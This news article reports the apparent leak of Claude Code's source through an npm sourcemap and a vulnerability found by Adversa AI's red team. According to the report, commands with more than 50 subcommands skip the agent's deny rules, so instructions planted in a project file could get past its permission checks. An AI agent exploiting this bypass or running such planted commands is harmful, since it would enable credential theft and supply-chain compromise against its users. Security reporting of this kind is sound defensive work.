Claude Code, an advanced AI tool from Anthropic, has found itself under scrutiny due to a significant security issue that emerged shortly after its source code was leaked. This incident has raised concerns about the potential risks and vulnerabilities inherent in the AI system.
Details of the Claude Code Leak
On March 31, 2026, a debugging JavaScript sourcemap for Claude Code version 2.1.88 was accidentally released on npm by Anthropic. This oversight was quickly identified by researcher Chaofan Shou, who shared the discovery on social media, prompting a widespread examination of the de-obfuscated code.
Efforts to reconstruct the code were led by Sigrid Jin, a student at the University of British Columbia, alongside Yeachan Heo. Their efforts resulted in the recreation and dissemination of Claude Code’s source code, comprising 512,000 lines of TypeScript across 1,900 files. While this leak poses certain risks, it does not include sensitive elements such as model weights or customer data, according to Melissa Bischoping of Tanium.
Exploring the Security Vulnerability
Shortly after the source code leak, Adversa AI Red Team uncovered a critical vulnerability within Claude Code itself. This software, consisting of over 519,000 lines of TypeScript, allows developers to manage various tasks from the command line. It features a permissions system designed to regulate command executions through allow, deny, and ask rules.
However, the permission system can be bypassed, potentially allowing unauthorized actions. The vulnerability arises from Anthropic’s performance optimization, which introduced a cap of 50 subcommands to prevent UI freezing. Commands exceeding this limit default to an ‘ask’ prompt, inadvertently allowing malicious instructions to bypass security checks.
Implications and Future Outlook
This vulnerability presents a significant risk, as attackers could exploit it to embed harmful commands within a project’s file, potentially leading to credential theft and supply chain compromises. Despite the presence of a safety layer in Claude’s language model, the flaw in the permission system remains a critical concern.
Adversa AI warns that a sophisticated attacker could leverage this vulnerability to execute malicious payloads, bypassing security measures and posing a threat to cloud infrastructure and CI/CD pipelines. As the situation unfolds, stakeholders will need to address these vulnerabilities to safeguard against potential exploitation.
The discovery of this flaw underscores the importance of rigorous security practices in software development, particularly in AI-driven applications. As the tech community responds to this challenge, ongoing vigilance and improvements in security protocols will be crucial to prevent future breaches.
